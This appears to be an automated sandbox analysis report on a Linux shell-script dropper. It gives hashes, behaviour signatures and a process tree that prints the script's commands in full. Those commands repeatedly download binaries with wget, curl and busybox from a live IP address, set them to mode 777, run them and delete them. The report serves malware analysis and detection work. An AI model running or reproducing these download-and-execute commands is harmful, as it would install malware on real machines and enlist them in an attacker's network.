Analysis
-
max time kernel
71s -
max time network
73s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
28/10/2024, 01:39
Static task
static1
Behavioral task
behavioral1
Sample
13f9c3ed50c26b9112e9e22469f5face1bf594623f0369925501490d0bdef040.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
13f9c3ed50c26b9112e9e22469f5face1bf594623f0369925501490d0bdef040.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
13f9c3ed50c26b9112e9e22469f5face1bf594623f0369925501490d0bdef040.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
13f9c3ed50c26b9112e9e22469f5face1bf594623f0369925501490d0bdef040.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
13f9c3ed50c26b9112e9e22469f5face1bf594623f0369925501490d0bdef040.sh
-
Size
10KB
-
MD5
c27e3dbba79b6afbd8c32c4e50cffe76
-
SHA1
b2ec5ed7bd931b3a3b970e1d5d209d031219a547
-
SHA256
13f9c3ed50c26b9112e9e22469f5face1bf594623f0369925501490d0bdef040
-
SHA512
382804bca6a3c36dfe896726e67efbf903aede59316574bba39dd8b943f31a5caefcd2d666eb0bd1513c38a33fcde0e4d9245781648860f8c077675e5206f023
-
SSDEEP
192:mhN4hJ8oKCm/mPmympmFmO/1JdUJh1s8hN4hJRJdUJhXm/mPmympmFmWo:eoKnue3kYO/Isrue3kYWo
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 758 chmod 958 chmod 922 chmod 874 chmod 916 chmod 928 chmod 748 chmod 811 chmod 880 chmod 964 chmod 970 chmod 868 chmod 892 chmod 898 chmod 946 chmod 976 chmod 805 chmod 862 chmod 904 chmod 910 chmod 952 chmod 982 chmod 742 chmod 856 chmod 934 chmod 940 chmod 838 chmod 886 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw 743 xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw /tmp/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF 749 fBl2KigufHZnmQqWghZFomThmvhAVfHNsF /tmp/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB 759 9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB /tmp/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o 806 jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o /tmp/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey 812 L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey /tmp/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod 840 vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod /tmp/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG 857 5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG /tmp/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4 863 2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4 /tmp/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq 869 qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq /tmp/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca 875 SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca /tmp/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp 881 ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp /tmp/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n 887 IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n /tmp/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL 893 YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL /tmp/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz 899 BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz /tmp/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp 905 ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp /tmp/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n 911 IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n /tmp/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL 917 YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL /tmp/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz 923 BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz /tmp/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o 929 jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o /tmp/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw 935 xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw /tmp/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF 941 fBl2KigufHZnmQqWghZFomThmvhAVfHNsF /tmp/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB 947 9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB /tmp/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca 953 SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca /tmp/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey 959 L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey /tmp/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod 965 vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod /tmp/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG 971 5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG /tmp/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4 977 2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4 /tmp/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq 983 qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB curl File opened for modification /tmp/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey curl File opened for modification /tmp/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4 curl File opened for modification /tmp/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n curl File opened for modification /tmp/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz curl File opened for modification /tmp/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey curl File opened for modification /tmp/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF curl File opened for modification /tmp/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp curl File opened for modification /tmp/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n curl File opened for modification /tmp/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o curl File opened for modification /tmp/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG curl File opened for modification /tmp/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod curl File opened for modification /tmp/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL curl File opened for modification /tmp/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw curl File opened for modification /tmp/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod curl File opened for modification /tmp/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o curl File opened for modification /tmp/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq curl File opened for modification /tmp/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw curl File opened for modification /tmp/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF curl File opened for modification /tmp/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL curl File opened for modification /tmp/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca curl File opened for modification /tmp/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp curl File opened for modification /tmp/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz curl File opened for modification /tmp/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca curl File opened for modification /tmp/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB curl File opened for modification /tmp/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4 curl File opened for modification /tmp/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq curl File opened for modification /tmp/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG curl
Processes
-
/tmp/13f9c3ed50c26b9112e9e22469f5face1bf594623f0369925501490d0bdef040.sh/tmp/13f9c3ed50c26b9112e9e22469f5face1bf594623f0369925501490d0bdef040.sh1⤵PID:711
-
/bin/rm/bin/rm bins.sh2⤵PID:716
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw2⤵PID:720
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:733
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw2⤵PID:741
-
-
/bin/chmodchmod 777 xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw2⤵
- File and Directory Permissions Modification
PID:742
-
-
/tmp/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw./xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw2⤵
- Executes dropped EXE
PID:743
-
-
/bin/rmrm xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw2⤵PID:744
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF2⤵PID:745
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:746
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF2⤵PID:747
-
-
/bin/chmodchmod 777 fBl2KigufHZnmQqWghZFomThmvhAVfHNsF2⤵
- File and Directory Permissions Modification
PID:748
-
-
/tmp/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF./fBl2KigufHZnmQqWghZFomThmvhAVfHNsF2⤵
- Executes dropped EXE
PID:749
-
-
/bin/rmrm fBl2KigufHZnmQqWghZFomThmvhAVfHNsF2⤵PID:750
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB2⤵PID:751
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:752
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB2⤵PID:753
-
-
/bin/chmodchmod 777 9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB2⤵
- File and Directory Permissions Modification
PID:758
-
-
/tmp/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB./9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB2⤵
- Executes dropped EXE
PID:759
-
-
/bin/rmrm 9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB2⤵PID:762
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o2⤵PID:764
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:803
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o2⤵PID:804
-
-
/bin/chmodchmod 777 jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o2⤵
- File and Directory Permissions Modification
PID:805
-
-
/tmp/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o./jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o2⤵
- Executes dropped EXE
PID:806
-
-
/bin/rmrm jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o2⤵PID:807
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey2⤵PID:808
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:809
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey2⤵PID:810
-
-
/bin/chmodchmod 777 L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey2⤵
- File and Directory Permissions Modification
PID:811
-
-
/tmp/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey./L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey2⤵
- Executes dropped EXE
PID:812
-
-
/bin/rmrm L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey2⤵PID:813
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod2⤵PID:814
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:822
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod2⤵PID:832
-
-
/bin/chmodchmod 777 vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod2⤵
- File and Directory Permissions Modification
PID:838
-
-
/tmp/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod./vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod2⤵
- Executes dropped EXE
PID:840
-
-
/bin/rmrm vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod2⤵PID:842
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG2⤵PID:844
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:851
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG2⤵PID:852
-
-
/bin/chmodchmod 777 5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG2⤵
- File and Directory Permissions Modification
PID:856
-
-
/tmp/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG./5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG2⤵
- Executes dropped EXE
PID:857
-
-
/bin/rmrm 5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG2⤵PID:858
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta42⤵PID:859
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:860
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta42⤵PID:861
-
-
/bin/chmodchmod 777 2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta42⤵
- File and Directory Permissions Modification
PID:862
-
-
/tmp/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4./2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta42⤵
- Executes dropped EXE
PID:863
-
-
/bin/rmrm 2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta42⤵PID:864
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq2⤵PID:865
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:866
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq2⤵PID:867
-
-
/bin/chmodchmod 777 qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq2⤵
- File and Directory Permissions Modification
PID:868
-
-
/tmp/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq./qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq2⤵
- Executes dropped EXE
PID:869
-
-
/bin/rmrm qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq2⤵PID:870
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca2⤵PID:871
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:872
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca2⤵PID:873
-
-
/bin/chmodchmod 777 SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca2⤵
- File and Directory Permissions Modification
PID:874
-
-
/tmp/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca./SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca2⤵
- Executes dropped EXE
PID:875
-
-
/bin/rmrm SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca2⤵PID:876
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp2⤵PID:877
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:878
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp2⤵PID:879
-
-
/bin/chmodchmod 777 ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp2⤵
- File and Directory Permissions Modification
PID:880
-
-
/tmp/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp./ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp2⤵
- Executes dropped EXE
PID:881
-
-
/bin/rmrm ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp2⤵PID:882
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n2⤵PID:883
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:884
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n2⤵PID:885
-
-
/bin/chmodchmod 777 IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n2⤵
- File and Directory Permissions Modification
PID:886
-
-
/tmp/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n./IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n2⤵
- Executes dropped EXE
PID:887
-
-
/bin/rmrm IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n2⤵PID:888
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL2⤵PID:889
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:890
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL2⤵PID:891
-
-
/bin/chmodchmod 777 YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL2⤵
- File and Directory Permissions Modification
PID:892
-
-
/tmp/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL./YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL2⤵
- Executes dropped EXE
PID:893
-
-
/bin/rmrm YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL2⤵PID:894
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz2⤵PID:895
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:896
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz2⤵PID:897
-
-
/bin/chmodchmod 777 BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz2⤵
- File and Directory Permissions Modification
PID:898
-
-
/tmp/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz./BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz2⤵
- Executes dropped EXE
PID:899
-
-
/bin/rmrm BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz2⤵PID:900
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp2⤵PID:901
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:902
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp2⤵PID:903
-
-
/bin/chmodchmod 777 ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp2⤵
- File and Directory Permissions Modification
PID:904
-
-
/tmp/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp./ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp2⤵
- Executes dropped EXE
PID:905
-
-
/bin/rmrm ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp2⤵PID:906
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n2⤵PID:907
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:908
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n2⤵PID:909
-
-
/bin/chmodchmod 777 IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n2⤵
- File and Directory Permissions Modification
PID:910
-
-
/tmp/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n./IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n2⤵
- Executes dropped EXE
PID:911
-
-
/bin/rmrm IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n2⤵PID:912
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL2⤵PID:913
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:914
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL2⤵PID:915
-
-
/bin/chmodchmod 777 YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL2⤵
- File and Directory Permissions Modification
PID:916
-
-
/tmp/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL./YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL2⤵
- Executes dropped EXE
PID:917
-
-
/bin/rmrm YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL2⤵PID:918
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz2⤵PID:919
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:920
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz2⤵PID:921
-
-
/bin/chmodchmod 777 BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz2⤵
- File and Directory Permissions Modification
PID:922
-
-
/tmp/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz./BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz2⤵
- Executes dropped EXE
PID:923
-
-
/bin/rmrm BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz2⤵PID:924
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o2⤵PID:925
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:926
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o2⤵PID:927
-
-
/bin/chmodchmod 777 jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o2⤵
- File and Directory Permissions Modification
PID:928
-
-
/tmp/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o./jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o2⤵
- Executes dropped EXE
PID:929
-
-
/bin/rmrm jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o2⤵PID:930
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw2⤵PID:931
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:932
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw2⤵PID:933
-
-
/bin/chmodchmod 777 xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw2⤵
- File and Directory Permissions Modification
PID:934
-
-
/tmp/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw./xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw2⤵
- Executes dropped EXE
PID:935
-
-
/bin/rmrm xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw2⤵PID:936
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF2⤵PID:937
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:938
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF2⤵PID:939
-
-
/bin/chmodchmod 777 fBl2KigufHZnmQqWghZFomThmvhAVfHNsF2⤵
- File and Directory Permissions Modification
PID:940
-
-
/tmp/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF./fBl2KigufHZnmQqWghZFomThmvhAVfHNsF2⤵
- Executes dropped EXE
PID:941
-
-
/bin/rmrm fBl2KigufHZnmQqWghZFomThmvhAVfHNsF2⤵PID:942
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB2⤵PID:943
-
-
